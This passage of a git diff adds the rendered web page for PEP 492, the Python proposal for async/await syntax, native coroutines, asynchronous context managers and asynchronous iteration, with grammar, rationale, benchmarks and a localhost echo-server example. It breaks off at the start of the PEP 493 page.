    To enable this behavior for coroutines, a new magic method called +__await__ is added. In asyncio, for instance, to enable Future +objects in await statements, the only change is to add +__await__ = __iter__ line to asyncio.Future class.

    +

    Objects with __await__ method are called Future-like objects in +the rest of this PEP.

    +

    It is a TypeError if __await__ returns anything but an +iterator.

    +
  • +
  • Objects defined with CPython C API with a tp_as_async.am_await +function, returning an iterator (similar to __await__ method).
  • +
+

It is a SyntaxError to use await outside of an async def +function (like it is a SyntaxError to use yield outside of +def function).

+

It is a TypeError to pass anything other than an awaitable object +to an await expression.
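A minimal Future-like object, for illustration: __await__ is written as a generator so that it returns an iterator, and the awaited result is carried by StopIteration (Ready and demo are hypothetical names):

class Ready:
    """Future-like object whose result is available immediately."""
    def __init__(self, value):
        self.value = value

    def __await__(self):
        return self.value
        yield   # unreachable; makes __await__ a generator (an iterator)

async def demo():
    print(await Ready(42))     # 42

coro = demo()
try:
    coro.send(None)            # drive the coroutine to completion by hand
except StopIteration:
    pass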

+
+

Updated operator precedence table

+

await keyword is defined as follows:

+
power ::=  await ["**" u_expr]
+await ::=  ["await"] primary
+
+
+

where “primary” represents the most tightly bound operations of the +language. Its syntax is:

+
primary ::=  atom | attributeref | subscription | slicing | call
+
+
+

See Python Documentation [12] and Grammar Updates section of this +proposal for details.

+

The key difference between await and the yield and yield from operators is that await expressions do not require parentheses around them most of the time.

+

Also, yield from allows any expression as its argument, including expressions like yield from a() + b(), which is parsed as yield from (a() + b()) and is almost always a bug. In general, the result of an arithmetic operation is not an awaitable object. To avoid this kind of mistake, it was decided to make await precedence lower than [], (), and ., but higher than the ** operator.

Operator                                                   | Description
-----------------------------------------------------------+------------------------------------------------------------
yield x, yield from x                                      | Yield expression
lambda                                                     | Lambda expression
if – else                                                  | Conditional expression
or                                                         | Boolean OR
and                                                        | Boolean AND
not x                                                      | Boolean NOT
in, not in, is, is not, <, <=, >, >=, !=, ==               | Comparisons, including membership tests and identity tests
|                                                          | Bitwise OR
^                                                          | Bitwise XOR
&                                                          | Bitwise AND
<<, >>                                                     | Shifts
+, -                                                       | Addition and subtraction
*, @, /, //, %                                             | Multiplication, matrix multiplication, division, remainder
+x, -x, ~x                                                 | Positive, negative, bitwise NOT
**                                                         | Exponentiation
await x                                                    | Await expression
x[index], x[index:index], x(arguments...), x.attribute    | Subscription, slicing, call, attribute reference
(expressions...), [expressions...], {key: value...}, {expressions...} | Binding or tuple display, list display, dictionary display, set display
+
+
+

Examples of “await” expressions

+

Valid syntax examples:

Expression                    | Will be parsed as
------------------------------+---------------------------------
if await fut: pass            | if (await fut): pass
if await fut + 1: pass        | if (await fut) + 1: pass
pair = await fut, 'spam'      | pair = (await fut), 'spam'
with await fut, open(): pass  | with (await fut), open(): pass
await foo()['spam'].baz()()   | await ( foo()['spam'].baz()() )
return await coro()           | return ( await coro() )
res = await coro() ** 2       | res = (await coro()) ** 2
func(a1=await coro(), a2=0)   | func(a1=(await coro()), a2=0)
await foo() + await bar()     | (await foo()) + (await bar())
-await foo()                  | -(await foo())
+

Invalid syntax examples:

Expression            | Should be written as
----------------------+------------------------
await await coro()    | await (await coro())
await -coro()         | await (-coro())
+
+
+
+

Asynchronous Context Managers and “async with”

+

An asynchronous context manager is a context manager that is able to +suspend execution in its enter and exit methods.

+

To make this possible, a new protocol for asynchronous context managers +is proposed. Two new magic methods are added: __aenter__ and +__aexit__. Both must return an awaitable.

+

An example of an asynchronous context manager:

+
class AsyncContextManager:
+    async def __aenter__(self):
+        await log('entering context')
+
+    async def __aexit__(self, exc_type, exc, tb):
+        await log('exiting context')
+
+
+
+

New Syntax

+

A new statement for asynchronous context managers is proposed:

+
async with EXPR as VAR:
+    BLOCK
+
+
+

which is semantically equivalent to:

+
mgr = (EXPR)
+aexit = type(mgr).__aexit__
+aenter = type(mgr).__aenter__
+
+VAR = await aenter(mgr)
+try:
+    BLOCK
+except:
+    if not await aexit(mgr, *sys.exc_info()):
+        raise
+else:
+    await aexit(mgr, None, None, None)
+
+
+

As with regular with statements, it is possible to specify multiple +context managers in a single async with statement.

+

It is an error to pass a regular context manager without __aenter__ +and __aexit__ methods to async with. It is a SyntaxError +to use async with outside of an async def function.

+
+
+

Example

+

With asynchronous context managers it is easy to implement proper +database transaction managers for coroutines:

+
async def commit(session, data):
+    ...
+
+    async with session.transaction():
+        ...
+        await session.update(data)
+        ...
+
+
+

Code that needs locking also looks lighter:

+
async with lock:
+    ...
+
+
+

instead of:

+
with (yield from lock):
+    ...
+
+
+
+
+
+

Asynchronous Iterators and “async for”

+

An asynchronous iterable is able to call asynchronous code in its iter implementation, and an asynchronous iterator can call asynchronous code in its next method. To support asynchronous iteration:

+
    +
  1. An object must implement an __aiter__ method (or, if defined +with CPython C API, tp_as_async.am_aiter slot) returning an +asynchronous iterator object.
  2. +
  3. An asynchronous iterator object must implement an __anext__ +method (or, if defined with CPython C API, tp_as_async.am_anext +slot) returning an awaitable.
  4. +
  5. To stop iteration __anext__ must raise a StopAsyncIteration +exception.
  6. +
+

An example of asynchronous iterable:

+
class AsyncIterable:
+    def __aiter__(self):
+        return self
+
+    async def __anext__(self):
+        data = await self.fetch_data()
+        if data:
+            return data
+        else:
+            raise StopAsyncIteration
+
+    async def fetch_data(self):
+        ...
+
+
+
+

New Syntax

+

A new statement for iterating through asynchronous iterators is +proposed:

+
async for TARGET in ITER:
+    BLOCK
+else:
+    BLOCK2
+
+
+

which is semantically equivalent to:

+
iter = (ITER)
+iter = type(iter).__aiter__(iter)
+running = True
+while running:
+    try:
+        TARGET = await type(iter).__anext__(iter)
+    except StopAsyncIteration:
+        running = False
+    else:
+        BLOCK
+else:
+    BLOCK2
+
+
+

It is a TypeError to pass a regular iterable without __aiter__ +method to async for. It is a SyntaxError to use async for +outside of an async def function.

+

As with the regular for statement, async for has an optional else clause.

+
+
+

Example 1

+

With asynchronous iteration protocol it is possible to asynchronously +buffer data during iteration:

+
async for data in cursor:
+    ...
+
+
+

Where cursor is an asynchronous iterator that prefetches N rows +of data from a database after every N iterations.

+

The following code illustrates new asynchronous iteration protocol:

+
class Cursor:
+    def __init__(self):
+        self.buffer = collections.deque()
+
+    async def _prefetch(self):
+        ...
+
+    def __aiter__(self):
+        return self
+
+    async def __anext__(self):
+        if not self.buffer:
+            self.buffer = await self._prefetch()
+            if not self.buffer:
+                raise StopAsyncIteration
+        return self.buffer.popleft()
+
+
+

then the Cursor class can be used as follows:

+
async for row in Cursor():
+    print(row)
+
+
+

which would be equivalent to the following code:

+
i = Cursor().__aiter__()
+while True:
+    try:
+        row = await i.__anext__()
+    except StopAsyncIteration:
+        break
+    else:
+        print(row)
+
+
+
+
+

Example 2

+

The following is a utility class that transforms a regular iterable to +an asynchronous one. While this is not a very useful thing to do, the +code illustrates the relationship between regular and asynchronous +iterators.

+
class AsyncIteratorWrapper:
+    def __init__(self, obj):
+        self._it = iter(obj)
+
+    def __aiter__(self):
+        return self
+
+    async def __anext__(self):
+        try:
+            value = next(self._it)
+        except StopIteration:
+            raise StopAsyncIteration
+        return value
+
+async for letter in AsyncIteratorWrapper("abc"):
+    print(letter)
+
+
+
+
+

Why StopAsyncIteration?

+

Coroutines are still based on generators internally. So, before PEP +479, there was no fundamental difference between

+
def g1():
+    yield from fut
+    return 'spam'
+
+
+

and

+
def g2():
+    yield from fut
+    raise StopIteration('spam')
+
+
+

And since PEP 479 is accepted and enabled by default for coroutines, the following example will have its StopIteration wrapped into a RuntimeError:

+
async def a1():
+    await fut
+    raise StopIteration('spam')
+
+
+

The only way to tell the outside code that the iteration has ended is +to raise something other than StopIteration. Therefore, a new +built-in exception class StopAsyncIteration was added.

+

Moreover, with semantics from PEP 479, all StopIteration exceptions +raised in coroutines are wrapped in RuntimeError.

+
+
+
+

Coroutine objects

+
+

Differences from generators

+

This section applies only to native coroutines with CO_COROUTINE +flag, i.e. defined with the new async def syntax.

+

The behavior of existing *generator-based coroutines* in asyncio +remains unchanged.

+

Great effort has been made to make sure that coroutines and +generators are treated as distinct concepts:

+
    +
  1. Native coroutine objects do not implement __iter__ and +__next__ methods. Therefore, they cannot be iterated over or +passed to iter(), list(), tuple() and other built-ins. +They also cannot be used in a for..in loop.

    An attempt to use __iter__ or __next__ on a native coroutine object will result in a TypeError (see the sketch after this list).

    +
  2. +
  3. Plain generators cannot yield from native coroutines: +doing so will result in a TypeError.
  4. +
  5. generator-based coroutines (for asyncio code must be decorated +with @asyncio.coroutine [1]) can yield from native coroutine +objects.
  6. +
  7. inspect.isgenerator() and inspect.isgeneratorfunction() +return False for native coroutine objects and native +coroutine functions.
  8. +
+
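A minimal sketch of that first point:

async def coro():
    return 42

c = coro()
try:
    iter(c)                    # native coroutine objects are not iterable
except TypeError as exc:
    print(exc)                 # 'coroutine' object is not iterable
c.close()                      # avoid the 'never awaited' RuntimeWarning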
+
+

Coroutine object methods

+

Coroutines are based on generators internally, thus they share the +implementation. Similarly to generator objects, coroutines have +throw(), send() and close() methods. StopIteration and +GeneratorExit play the same role for coroutines (although +PEP 479 is enabled by default for coroutines). See PEP 342, PEP 380, +and Python Documentation [11] for details.

+

throw(), send() methods for coroutines are used to push +values and raise errors into Future-like objects.

+
+
+
+

Debugging Features

+

A common beginner mistake is forgetting to use yield from on +coroutines:

+
@asyncio.coroutine
+def useful():
+    asyncio.sleep(1) # this will do nothing without 'yield from'
+
+
+

For debugging this kind of mistake there is a special debug mode in asyncio, in which the @coroutine decorator wraps all functions with a special object whose destructor logs a warning. Whenever a wrapped generator gets garbage collected, a detailed logging message is generated with information about where exactly the decorated function was defined, a stack trace of where it was collected, etc. The wrapper object also provides a convenient __repr__ function with detailed information about the generator.

+

The only problem is how to enable these debug capabilities. Since +debug facilities should be a no-op in production mode, @coroutine +decorator makes the decision of whether to wrap or not to wrap based on +an OS environment variable PYTHONASYNCIODEBUG. This way it is +possible to run asyncio programs with asyncio’s own functions +instrumented. EventLoop.set_debug, a different debug facility, has +no impact on @coroutine decorator’s behavior.

+

With this proposal, coroutines become a native concept, distinct from generators. In addition to a RuntimeWarning being raised on coroutines that were never awaited, it is proposed to add two new functions to the sys module: set_coroutine_wrapper and get_coroutine_wrapper. These enable advanced debugging facilities in asyncio and other frameworks (such as displaying where exactly a coroutine was created, and a more detailed stack trace of where it was garbage collected).
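A minimal sketch of how a framework might use the proposed hook; the wrapper below records where each coroutine object was created and returns it unchanged (creation_tracker is a hypothetical name):

import sys

def creation_tracker(coro):
    # Called for every native coroutine object that gets created.
    frame = sys._getframe(1)
    print("coroutine created at {}:{}".format(
        frame.f_code.co_filename, frame.f_lineno))
    return coro

sys.set_coroutine_wrapper(creation_tracker)

async def task():
    pass

t = task()                     # prints the creation site
t.close()
sys.set_coroutine_wrapper(None)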

+
+
+

New Standard Library Functions

+
    +
  • types.coroutine(gen). See types.coroutine() section for +details.
  • +
  • inspect.iscoroutine(obj) returns True if obj is a +native coroutine object.
  • +
  • inspect.iscoroutinefunction(obj) returns True if obj is a +native coroutine function.
  • +
  • inspect.isawaitable(obj) returns True if obj is an +awaitable.
  • +
  • inspect.getcoroutinestate(coro) returns the current state of a native coroutine object (mirrors inspect.getgeneratorstate(gen)).
  • +
  • inspect.getcoroutinelocals(coro) returns the mapping of a +native coroutine object’s local variables to their values +(mirrors inspect.getgeneratorlocals(gen)).
  • +
  • sys.set_coroutine_wrapper(wrapper) allows intercepting the creation of native coroutine objects. wrapper must be either a callable that accepts one argument (a coroutine object), or None. None resets the wrapper. If called twice, the new wrapper replaces the previous one. The function is thread-specific. See Debugging Features for more details.
  • +
  • sys.get_coroutine_wrapper() returns the current wrapper object. +Returns None if no wrapper was set. The function is +thread-specific. See Debugging Features for more details.
  • +
+
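A few of these predicates in action (a sketch; the function names are hypothetical):

import inspect
import types

async def native():
    pass

@types.coroutine
def genbased():
    yield

c = native()
print(inspect.iscoroutinefunction(native))   # True
print(inspect.iscoroutine(c))                # True
print(inspect.isawaitable(genbased()))       # True
c.close()   # suppress the 'never awaited' RuntimeWarning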
+
+

New Abstract Base Classes

+

In order to allow better integration with existing frameworks (such as +Tornado, see [13]) and compilers (such as Cython, see [16]), two new +Abstract Base Classes (ABC) are added:

+
    +
  • collections.abc.Awaitable ABC for Future-like classes, that +implement __await__ method.
  • +
  • collections.abc.Coroutine ABC for coroutine objects, that +implement send(value), throw(type, exc, tb), close() and +__await__() methods.

    Note that generator-based coroutines with CO_ITERABLE_COROUTINE +flag do not implement __await__ method, and therefore are not +instances of collections.abc.Coroutine and +collections.abc.Awaitable ABCs:

    +
    @types.coroutine
    +def gencoro():
    +    yield
    +
    +assert not isinstance(gencoro(), collections.abc.Coroutine)
    +
    +# however:
    +assert inspect.isawaitable(gencoro())
    +
    +
    +
  • +
+

To allow easy testing if objects support asynchronous iteration, two +more ABCs are added:

+
    +
  • collections.abc.AsyncIterable – tests for __aiter__ method.
  • +
  • collections.abc.AsyncIterator – tests for __aiter__ and +__anext__ methods.
  • +
+
+
+
+

Glossary

+
+
Native coroutine function
A coroutine function is declared with async def. It uses +await and return value; see New Coroutine Declaration +Syntax for details.
+
Native coroutine
Returned from a native coroutine function. See Await Expression +for details.
+
Generator-based coroutine function
Coroutines based on generator syntax. Most common example are +functions decorated with @asyncio.coroutine.
+
Generator-based coroutine
Returned from a generator-based coroutine function.
+
Coroutine
Either native coroutine or generator-based coroutine.
+
Coroutine object
Either native coroutine object or generator-based coroutine +object.
+
Future-like object
An object with an __await__ method, or a C object with +tp_as_async->am_await function, returning an iterator. Can be +consumed by an await expression in a coroutine. A coroutine +waiting for a Future-like object is suspended until the Future-like +object’s __await__ completes, and returns the result. See +Await Expression for details.
+
Awaitable
A Future-like object or a coroutine object. See Await +Expression for details.
+
Asynchronous context manager
An asynchronous context manager has __aenter__ and __aexit__ +methods and can be used with async with. See Asynchronous +Context Managers and “async with” for details.
+
Asynchronous iterable
An object with an __aiter__ method, which must return an +asynchronous iterator object. Can be used with async for. +See Asynchronous Iterators and “async for” for details.
+
Asynchronous iterator
An asynchronous iterator has an __anext__ method. See +Asynchronous Iterators and “async for” for details.
+
+
+
+

Transition Plan

+

To avoid backwards compatibility issues with the async and await keywords, it was decided to modify tokenizer.c in such a way that it:

+
    +
  • recognizes async def NAME tokens combination;
  • +
  • while tokenizing async def block, it replaces 'async' +NAME token with ASYNC, and 'await' NAME token with +AWAIT;
  • +
  • while tokenizing def block, it yields 'async' and 'await' +NAME tokens as is.
  • +
+

This approach allows for seamless combination of new syntax features +(all of them available only in async functions) with any existing +code.

+

An example of having “async def” and “async” attribute in one piece of +code:

+
class Spam:
+    async = 42
+
+async def ham():
+    print(getattr(Spam, 'async'))
+
+# The coroutine can be executed and will print '42'
+
+
+
+

Backwards Compatibility

+

This proposal preserves 100% backwards compatibility.

+
+

asyncio

+

The asyncio module was adapted and tested to work with coroutines and the new statements. Backwards compatibility is 100% preserved, i.e. all existing code will work as-is.

+

The required changes are mainly:

+
    +
  1. Modify @asyncio.coroutine decorator to use new +types.coroutine() function.
  2. +
  3. Add __await__ = __iter__ line to asyncio.Future class.
  4. +
  5. Add ensure_future() as an alias for async() function. +Deprecate async() function.
  6. +
+
+
+

asyncio migration strategy

+

Because plain generators cannot yield from native coroutine +objects (see Differences from generators section for more details), +it is advised to make sure that all generator-based coroutines are +decorated with @asyncio.coroutine before starting to use the new +syntax.
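Concretely, under 3.5-era asyncio, a decorated generator-based coroutine can be awaited from new-style code (a sketch; legacy and modern are hypothetical names):

import asyncio

@asyncio.coroutine
def legacy():
    # Generator-based coroutine; the decorator makes it awaitable.
    yield from asyncio.sleep(0)
    return 'legacy result'

async def modern():
    return await legacy()

loop = asyncio.get_event_loop()
print(loop.run_until_complete(modern()))     # legacy result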

+
+
+

async/await in CPython code base

+

There are no uses of await as a name in CPython.

+

async is mostly used by asyncio. We are addressing this by +renaming async() function to ensure_future() (see asyncio +section for details).

+

Another use of the async keyword is in Lib/xml/dom/xmlbuilder.py, which defines an async = False attribute for the DocumentLS class. There is no documentation or tests for it, and it is not used anywhere else in CPython. It is replaced with a getter that raises a DeprecationWarning, advising use of the async_ attribute instead.

+
+
+
+

Grammar Updates

+

Grammar changes are fairly minimal:

+
decorated: decorators (classdef | funcdef | async_funcdef)
+async_funcdef: ASYNC funcdef
+
+compound_stmt: (if_stmt | while_stmt | for_stmt | try_stmt | with_stmt
+                | funcdef | classdef | decorated | async_stmt)
+
+async_stmt: ASYNC (funcdef | with_stmt | for_stmt)
+
+power: atom_expr ['**' factor]
+atom_expr: [AWAIT] atom trailer*
+
+
+
+
+

Deprecation Plans

+

async and await names will be softly deprecated in CPython 3.5 +and 3.6. In 3.7 we will transform them to proper keywords. Making +async and await proper keywords before 3.7 might make it harder +for people to port their code to Python 3.

+
+
+
+

Design Considerations

+
+

PEP 3152

+

PEP 3152 by Gregory Ewing proposes a different mechanism for coroutines +(called “cofunctions”). Some key points:

+
    +
  1. A new keyword codef to declare a cofunction. A cofunction is always a generator, even if there are no cocall expressions inside it. Maps to async def in this proposal.
  2. +
  3. A new keyword cocall to call a cofunction. Can only be used +inside a cofunction. Maps to await in this proposal (with +some differences, see below).
  4. +
  5. It is not possible to call a cofunction without a cocall +keyword.
  6. +
  7. cocall grammatically requires parentheses after it:
    atom: cocall | <existing alternatives for atom>
    +cocall: 'cocall' atom cotrailer* '(' [arglist] ')'
    +cotrailer: '[' subscriptlist ']' | '.' NAME
    +
    +
    +
  8. +
  9. cocall f(*args, **kwds) is semantically equivalent to +yield from f.__cocall__(*args, **kwds).
  10. +
+

Differences from this proposal:

+
    +
  1. There is no equivalent of __cocall__ in this PEP, which is called and its result is passed to yield from in the cocall expression. The await keyword expects an awaitable object, validates the type, and executes yield from on it. The __await__ method is similar to __cocall__, but it is only used to define Future-like objects.
  2. +
  3. await is defined in almost the same way as yield from in the +grammar (it is later enforced that await can only be inside +async def). It is possible to simply write await future, +whereas cocall always requires parentheses.
  4. +
  5. To make asyncio work with PEP 3152 it would be required to modify +@asyncio.coroutine decorator to wrap all functions in an object +with a __cocall__ method, or to implement __cocall__ on +generators. To call cofunctions from existing generator-based +coroutines it would be required to use costart(cofunc, *args, +**kwargs) built-in.
  6. +
  7. Since it is impossible to call a cofunction without a cocall +keyword, it automatically prevents the common mistake of forgetting +to use yield from on generator-based coroutines. This proposal +addresses this problem with a different approach, see Debugging +Features.
  8. +
  9. A shortcoming of requiring a cocall keyword to call a coroutine is that if it is decided to implement coroutine-generators – coroutines with yield or async yield expressions – we wouldn’t need a cocall keyword to call them. So we’ll end up having __cocall__ and no __call__ for regular coroutines, and having __call__ and no __cocall__ for coroutine-generators.
  10. +
  11. Requiring parentheses grammatically also introduces a whole lot +of new problems.

    The following code:

    +
    await fut
    +await function_returning_future()
    +await asyncio.gather(coro1(arg1, arg2), coro2(arg1, arg2))
    +
    +
    +

    would look like:

    +
    cocall fut()  # or cocall costart(fut)
    +cocall (function_returning_future())()
    +cocall asyncio.gather(costart(coro1, arg1, arg2),
    +                      costart(coro2, arg1, arg2))
    +
    +
    +
  12. +
  13. There are no equivalents of async for and async with in PEP +3152.
  14. +
+
+
+

Coroutine-generators

+

With the async for keyword it is desirable to have a concept of a coroutine-generator – a coroutine with yield and yield from expressions. To avoid any ambiguity with regular generators, we would likely require an async keyword before yield, and async yield from would raise a StopAsyncIteration exception.

+

While it is possible to implement coroutine-generators, we believe that they are out of scope of this proposal. It is an advanced concept that should be carefully considered and balanced, and it would require non-trivial changes in the implementation of current generator objects. This is a matter for a separate PEP.

+
+
+

Why “async” and “await” keywords

+

async/await is not a new concept in programming languages:

+
    +
  • C# has had it for a long time [5];
  • +
  • proposal to add async/await in ECMAScript 7 [2]; +see also Traceur project [9];
  • +
  • Facebook’s Hack/HHVM [6];
  • +
  • Google’s Dart language [7];
  • +
  • Scala [8];
  • +
  • proposal to add async/await to C++ [10];
  • +
  • and many other less popular languages.
  • +
+

This is a huge benefit, as some users already have experience with +async/await, and because it makes working with many languages in one +project easier (Python with ECMAScript 7 for instance).

+
+
+

Why “__aiter__” does not return an awaitable

+

PEP 492 was accepted in CPython 3.5.0 with __aiter__ defined as a method that was expected to return an awaitable resolving to an asynchronous iterator.

+

In 3.5.2 (as PEP 492 was accepted on a provisional basis) the +__aiter__ protocol was updated to return asynchronous iterators +directly.

+

The motivation behind this change is to make it possible to +implement asynchronous generators in Python. See [19] and [20] for +more details.

+
+
+

Importance of “async” keyword

+

While it is possible to just implement the await expression and treat all functions with at least one await as coroutines, this approach makes API design, code refactoring, and long-term support harder.

+

Let’s pretend that Python only has await keyword:

+
def useful():
+    ...
+    await log(...)
+    ...
+
+def important():
+    await useful()
+
+
+

If the useful() function is refactored and someone removes all await expressions from it, it would become a regular Python function, and all code that depends on it, including important(), would be broken. To mitigate this issue a decorator similar to @asyncio.coroutine has to be introduced.

+
+
+

Why “async def”

+

For some people bare async name(): pass syntax might look more +appealing than async def name(): pass. It is certainly easier to +type. But on the other hand, it breaks the symmetry between async +def, async with and async for, where async is a modifier, +stating that the statement is asynchronous. It is also more consistent +with the existing grammar.

+
+
+

Why not “await for” and “await with”

+

async is an adjective, and hence it is a better choice for a +statement qualifier keyword. await for/with would imply that +something is awaiting for a completion of a for or with +statement.

+
+
+

Why “async def” and not “def async”

+

async keyword is a statement qualifier. A good analogy to it are +“static”, “public”, “unsafe” keywords from other languages. “async +for” is an asynchronous “for” statement, “async with” is an +asynchronous “with” statement, “async def” is an asynchronous function.

+

Having “async” after the main statement keyword might introduce some +confusion, like “for async item in iterator” can be read as “for each +asynchronous item in iterator”.

+

Having the async keyword before def, with and for also makes the language grammar simpler, and “async def” better separates coroutines from regular functions visually.

+
+
+

Why not a __future__ import

+

The Transition Plan section explains how the tokenizer is modified to treat async and await as keywords only inside async def blocks. Hence async def fills the role that a module-level compiler declaration like from __future__ import async_await would otherwise fill.
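As a consequence, in CPython 3.5 and 3.6 both names remained usable as ordinary identifiers outside of async def blocks (3.6 emitted a deprecation warning, and they only became reserved keywords in 3.7). For instance, the following was still valid code in 3.5/3.6:

async = 1           # fine: 'async' is only a keyword inside 'async def'

def await(x):       # likewise 'await' outside 'async def'
    return x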

+
+
+

Why magic methods start with “a”

+

The new asynchronous magic methods __aiter__, __anext__, __aenter__, and __aexit__ all start with the same prefix “a”. An alternative proposal was to use an “async” prefix, so that __anext__ becomes __async_next__. However, to align the new magic methods with existing ones, such as __radd__ and __iadd__, it was decided to use the shorter version.

+
+
+

Why not reuse existing magic names

+

An alternative idea about new asynchronous iterators and context +managers was to reuse existing magic methods, by adding an async +keyword to their declarations:

+
class CM:
+    async def __enter__(self): # instead of __aenter__
+        ...
+
+
+

This approach has the following downsides:

+
    +
  • it would not be possible to create an object that works in both with and async with statements (see the sketch after this list);
  • +
  • it would break backwards compatibility, as nothing prohibits returning Future-like objects from __enter__ and/or __exit__ in Python <= 3.4;
  • +
  • one of the main points of this proposal is to make native coroutines +as simple and foolproof as possible, hence the clear separation of +the protocols.
  • +
+
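To illustrate the first downside: with the separate __aenter__/__aexit__ names, a single object can support both statements, which would be impossible if the synchronous and asynchronous protocols shared method names. A sketch:

class Resource:
    # Synchronous protocol, for 'with'.
    def __enter__(self):
        return self

    def __exit__(self, *exc_info):
        return False

    # Asynchronous protocol, for 'async with'; the two can coexist
    # only because the method names are distinct.
    async def __aenter__(self):
        return self

    async def __aexit__(self, *exc_info):
        return False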
+
+

Why not reuse existing “for” and “with” statements

+

The vision behind existing generator-based coroutines and this proposal is to make it easy for users to see where the code might be suspended. Making the existing “for” and “with” statements recognize asynchronous iterators and context managers would inevitably create implicit suspend points, making it harder to reason about the code.

+
+
+

Comprehensions

+

Syntax for asynchronous comprehensions could be provided, but this +construct is outside of the scope of this PEP.
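Asynchronous comprehensions were subsequently added by PEP 530 in Python 3.6. A minimal example of that later syntax, where aiterable stands for any asynchronous iterable:

async def collect(aiterable):
    # 'aiterable' is any object implementing __aiter__/__anext__
    return [i async for i in aiterable if i % 2]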

+
+
+

Async lambda functions

+

Syntax for asynchronous lambda functions could be provided, but this +construct is outside of the scope of this PEP.

+
+
+
+

Performance

+
+

Overall Impact

+

This proposal introduces no observable performance impact. Here is the output of Python’s official benchmark suite [4]:

+
python perf.py -r -b default ../cpython/python.exe ../cpython-aw/python.exe
+
+[skipped]
+
+Report on Darwin ysmac 14.3.0 Darwin Kernel Version 14.3.0:
+Mon Mar 23 11:59:05 PDT 2015; root:xnu-2782.20.48~5/RELEASE_X86_64
+x86_64 i386
+
+Total CPU cores: 8
+
+### etree_iterparse ###
+Min: 0.365359 -> 0.349168: 1.05x faster
+Avg: 0.396924 -> 0.379735: 1.05x faster
+Significant (t=9.71)
+Stddev: 0.01225 -> 0.01277: 1.0423x larger
+
+The following not significant results are hidden, use -v to show them:
+django_v2, 2to3, etree_generate, etree_parse, etree_process, fastpickle,
+fastunpickle, json_dump_v2, json_load, nbody, regex_v8, tornado_http.
+
+
+
+
+

Tokenizer modifications

+

There is no observable slowdown when parsing Python files with the modified tokenizer: parsing one 12 MB file (Lib/test/test_binop.py repeated 1000 times) takes the same amount of time.

+
+
+

async/await

+

The following micro-benchmark was used to determine performance +difference between “async” functions and generators:

+
import sys
+import time
+
+def binary(n):
+    if n <= 0:
+        return 1
+    l = yield from binary(n - 1)
+    r = yield from binary(n - 1)
+    return l + 1 + r
+
+async def abinary(n):
+    if n <= 0:
+        return 1
+    l = await abinary(n - 1)
+    r = await abinary(n - 1)
+    return l + 1 + r
+
+def timeit(func, depth, repeat):
+    t0 = time.time()
+    for _ in range(repeat):
+        o = func(depth)
+        try:
+            while True:
+                o.send(None)
+        except StopIteration:
+            pass
+    t1 = time.time()
+    print('{}({}) * {}: total {:.3f}s'.format(
+        func.__name__, depth, repeat, t1-t0))
+
+
+

The result is that there is no observable performance difference:

+
binary(19) * 30: total 53.321s
+abinary(19) * 30: total 55.073s
+
+binary(19) * 30: total 53.361s
+abinary(19) * 30: total 51.360s
+
+binary(19) * 30: total 49.438s
+abinary(19) * 30: total 51.047s
+
+
+

Note that depth of 19 means 1,048,575 calls.

+
+
+
+

Reference Implementation

+

The reference implementation can be found here: [3].

+
+

List of high-level changes and new protocols

+
    +
  1. New syntax for defining coroutines: async def and new await +keyword.
  2. +
  3. New __await__ method for Future-like objects, and new +tp_as_async.am_await slot in PyTypeObject.
  4. +
  5. New syntax for asynchronous context managers: async with. And +associated protocol with __aenter__ and __aexit__ methods.
  6. +
  7. New syntax for asynchronous iteration: async for. And the associated protocol with __aiter__, __anext__ and the new built-in exception StopAsyncIteration. New tp_as_async.am_aiter and tp_as_async.am_anext slots in PyTypeObject.
  8. +
  9. New AST nodes: AsyncFunctionDef, AsyncFor, AsyncWith, +Await.
  10. +
  11. New functions: sys.set_coroutine_wrapper(callback), +sys.get_coroutine_wrapper(), types.coroutine(gen), +inspect.iscoroutinefunction(func), inspect.iscoroutine(obj), +inspect.isawaitable(obj), inspect.getcoroutinestate(coro), +and inspect.getcoroutinelocals(coro).
  12. +
  13. New CO_COROUTINE and CO_ITERABLE_COROUTINE bit flags for code +objects.
  14. +
  15. New ABCs: collections.abc.Awaitable, +collections.abc.Coroutine, collections.abc.AsyncIterable, and +collections.abc.AsyncIterator.
  16. +
  17. C API changes: new PyCoro_Type (exposed to Python as +types.CoroutineType) and PyCoroObject. +PyCoro_CheckExact(*o) to test if o is a native coroutine.
  18. +
+

While the list of changes and new things is not short, it is important to understand that most users will not use these features directly. They are intended to be used in frameworks and libraries to provide users with convenient and unambiguous APIs built on the async def, await, async for and async with syntax.
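A short sketch of the new introspection and interoperability helpers in action (Python 3.5+):

import inspect
import types

@types.coroutine
def old_style():
    # A generator-based coroutine, made awaitable by the decorator.
    yield

async def new_style():
    await old_style()

print(inspect.iscoroutinefunction(new_style))  # True
coro = new_style()
print(inspect.iscoroutine(coro))               # True
print(inspect.isawaitable(coro))               # True
print(inspect.getcoroutinestate(coro))         # 'CORO_CREATED'
coro.close()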

+
+
+

Working example

+

All concepts proposed in this PEP are implemented [3] and can be +tested.

+
import asyncio
+
+async def echo_server():
+    print('Serving on localhost:8000')
+    await asyncio.start_server(handle_connection,
+                               'localhost', 8000)
+
+async def handle_connection(reader, writer):
+    print('New connection...')
+
+    while True:
+        data = await reader.read(8192)
+
+        if not data:
+            break
+
+        print('Sending {:.10}... back'.format(repr(data)))
+        writer.write(data)
+
+loop = asyncio.get_event_loop()
+loop.run_until_complete(echo_server())
+try:
+    loop.run_forever()
+finally:
+    loop.close()
+
+
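The server can be exercised with a small companion client (illustrative, not part of the PEP):

import asyncio

async def client():
    reader, writer = await asyncio.open_connection('localhost', 8000)
    writer.write(b'Hello, world!')
    print(await reader.read(8192))
    writer.close()

asyncio.get_event_loop().run_until_complete(client())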
+
+
+
+

Acceptance

+

PEP 492 was accepted by Guido, Tuesday, May 5, 2015 [14].

+
+
+

Implementation

+

The implementation is tracked in issue 24017 [15]. It was +committed on May 11, 2015.

+
+
+

References

+ +
+
+

Acknowledgments

+

I thank Guido van Rossum, Victor Stinner, Elvis Pranskevichus, Andrew +Svetlov, Łukasz Langa, Greg Ewing, Stephen J. Turnbull, Jim J. Jewett, +Brett Cannon, Alyssa Coghlan, Steven D’Aprano, Paul Moore, Nathaniel +Smith, Ethan Furman, Stefan Behnel, Paul Sokolovsky, Victor Petrovykh, +and many others for their feedback, ideas, edits, criticism, code +reviews, and discussions around this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0492.rst

+


+ +
+ +
\ No newline at end of file
diff --git a/pep-0493/index.html b/pep-0493/index.html
new file mode 100644
index 00000000000..5ed4d87f570
--- /dev/null
+++ b/pep-0493/index.html
@@ -0,0 +1,726 @@

PEP 493 – HTTPS verification migration tools for Python 2.7 | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

